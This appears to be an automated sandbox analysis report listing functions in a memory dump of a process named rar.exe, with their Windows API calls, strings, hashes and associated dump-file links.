swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EEBBED8

Strings

%u-%02u-%02u %02u:%02u:%02u,%09u, xrefs: 00007FF74EEBBE80
????-??-?? ??:??, xrefs: 00007FF74EEBBEDF
%u-%02u-%02u %02u:%02u, xrefs: 00007FF74EEBBEB8

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Time$File$swprintf$LocalSystem
String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
API String ID: 1364621626-1794493780
Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction ID: f41472ccd8884beea9d3bd40512a327d449da3481d00146ffb05f4f67bb404cb
Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction Fuzzy Hash: 18210C76A18251CEE760EF68E4806ADB7F0F748794F544132EE8893B58DB78D5418F10

Function 00007FF74EE880C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF74EE8814D
CharToOemA.USER32 ref: 00007FF74EE881D8
WriteFile.KERNEL32 ref: 00007FF74EE881FB
GetStdHandle.KERNEL32 ref: 00007FF74EE88242
WriteConsoleW.KERNEL32 ref: 00007FF74EE88266

Part of subcall function 00007FF74EEBD840: WideCharToMultiByte.KERNEL32 ref: 00007FF74EEBD871

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CharHandleWrite$ByteConsoleFileMultiWide
String ID:
API String ID: 643171463-0
Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction ID: d6fbf49ba9f4f7a6dd8aea773d19437e58258086aaebcf9914b63586e855ae4b
Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction Fuzzy Hash: 1741C721E0CAA2C2FA14BB61A8102B9E351BF457F0FC40335DD6D177D1DEBCA4558720

Function 00007FF74EED69B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF74EED6AD6

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction ID: 0fb5c927b062316ccc7cb112df73d14c773ef5420f7870c9fc9b9d4bce6aef2d
Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction Fuzzy Hash: A841B321B0D623D1FA15BB55A8009B5B2A1BF04BF0F8E8935DDAD4B794EEBCE4008360

Function 00007FF74EEDDC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF74EEDDC47
_set_statfp.LIBCMT ref: 00007FF74EEDDC62
_set_statfp.LIBCMT ref: 00007FF74EEDDC7E
_set_statfp.LIBCMT ref: 00007FF74EEDDCBA

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction ID: 628532e5751b618584ad9aa7c7d8b09faeb09c110a74acacbbfc472b316a37f6
Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction Fuzzy Hash: 46114266E1C62385F6643328E486BB99141BF55370F8C4734E97E566E6CEECE4404221

Function 00007FF74EE96FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EE97176
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EE97221

Strings

%c%c%c%c%c%c%c, xrefs: 00007FF74EE971E3
%c%c%c%c%c%c%c%c%c, xrefs: 00007FF74EE9716F

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: swprintf
String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
API String ID: 233258989-622958660
Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction ID: beec7fa2f43bf0991a83ee405923f1d0f9e519bdd224ed245b93b852a2117c7c
Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction Fuzzy Hash: 47516AF3F3C250CAF3249F1CE841BA96690F764BA0F945A34F94A93B44C63DDA448700

Function 00007FF74EE86E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

wcschr.LIBVCRUNTIME ref: 00007FF74EE86EC8
wcschr.LIBVCRUNTIME ref: 00007FF74EE86F16

Strings

MCAOmcao, xrefs: 00007FF74EE86EC1
MCAOmcao, xrefs: 00007FF74EE86F0F

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: wcschr
String ID: MCAOmcao$MCAOmcao
API String ID: 1497570035-1725859250
Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction ID: e36f683307d616d23a828dbd7e37995c4d7fbe89e5da1b8f1524a370d7b25b3d
Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction Fuzzy Hash: 6441B012D0C5E3C4FA21BF22950157EE261BF11BB4FD84931DA5D4B2D6EEADE9908231

Function 00007FF74EEC2984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF74EEC2B96
_CxxThrowException.LIBVCRUNTIME ref: 00007FF74EEC2BA7

Part of subcall function 00007FF74EECBA34: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74EECB313), ref: 00007FF74EECBAB1
Part of subcall function 00007FF74EECBA34: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74EECB313), ref: 00007FF74EECBAF0

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF74EEC2BB2
_CxxThrowException.LIBVCRUNTIME ref: 00007FF74EEC2BC3

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
String ID:
API String ID: 904936192-0
Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction ID: 76e862450c4da2114cc6b34e0adc43c024c7e3d200ebe0d592a87c9a6c0a0a2b
Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction Fuzzy Hash: 0351F262A09A91C1FB00EF25D4403ACB3A5FB88BA4F848231DF9E47795DFB9D555C320

Function 00007FF74EE8D048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D09D
CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D0E5
CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D114
CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D15C

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction ID: e8f39374c41eae7969868b3008d4028ffbeb0022bdf6727765bae997f7d670c4
Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction Fuzzy Hash: A8314131618B5582F760AF11F55476AB7A5F749BB4F904329EAAC07BC8CF7CD0448B10

Function 00007FF74EEACFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74EEBB6D0: Sleep.KERNEL32(?,?,?,?,00007FF74EE8CBED,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EEBB730

new.LIBCMT ref: 00007FF74EEACFD9

Strings

rev, xrefs: 00007FF74EEAD00F
rar, xrefs: 00007FF74EEAD074

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Sleep
String ID: rar$rev
API String ID: 3472027048-2145959568
Opcode ID: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
Instruction ID: b10e8ac1ed583d8ee90b07dc85038b42511593dbeaab4ada252f58ebded77f18
Opcode Fuzzy Hash: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
Instruction Fuzzy Hash: 79A1AE22A0D6A2C5FB20FB20D4542BDA3A6FF547A8FC54039DA5D076D6DEECE544C360

Function 00007FF74EED5CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED5D17

Strings

e+000, xrefs: 00007FF74EED5DBF
gfff, xrefs: 00007FF74EED5E42

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction ID: 846650c5386190b46f269a0b13b5c3d401f21599a97cb4e5e162be8abd745ec1
Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction Fuzzy Hash: 7F512762F1C7D2C6F725BB359840769AA95F740BA0F8C8231CAA88BBD5CF6CD444C710

Function 00007FF74EED3B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED3B36
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF74EECB066), ref: 00007FF74EED3B57

Strings

C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe, xrefs: 00007FF74EED3B45

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe
API String ID: 3307058713-8968610
Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction ID: 7f2c66005f6e5c490312b0a89c18d0141791113daa20264214e1ffb05425c51b
Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction Fuzzy Hash: 5D416936A0CA63C5FB54FF25E4408BCE7A4FB44BA4B994035E91D47B95EEBDE8418320

Function 00007FF74EEB7C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,00007FF74EEB7471), ref: 00007FF74EEB7C96
wcsstr.LIBVCRUNTIME ref: 00007FF74EEB7CBC

Strings

System Volume Information\, xrefs: 00007FF74EEB7CB2

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AttributesFilewcsstr
String ID: System Volume Information\
API String ID: 1592324571-4227249723
Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction ID: 44fc16edda9598672688cbdd305a0028ecef144b3343467b9ddc6824809f7408
Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction Fuzzy Hash: E531D321A2D691C9FB51FB21E1506B9ABA0BF45BE0F844234DECD17B96DFBCE4418720

Function 00007FF74EEB3C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EEB3CB0

Strings

@%s, xrefs: 00007FF74EEB3C94
$%s, xrefs: 00007FF74EEB3C9D

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: snprintf
String ID: $%s$@%s
API String ID: 4288800496-834177443
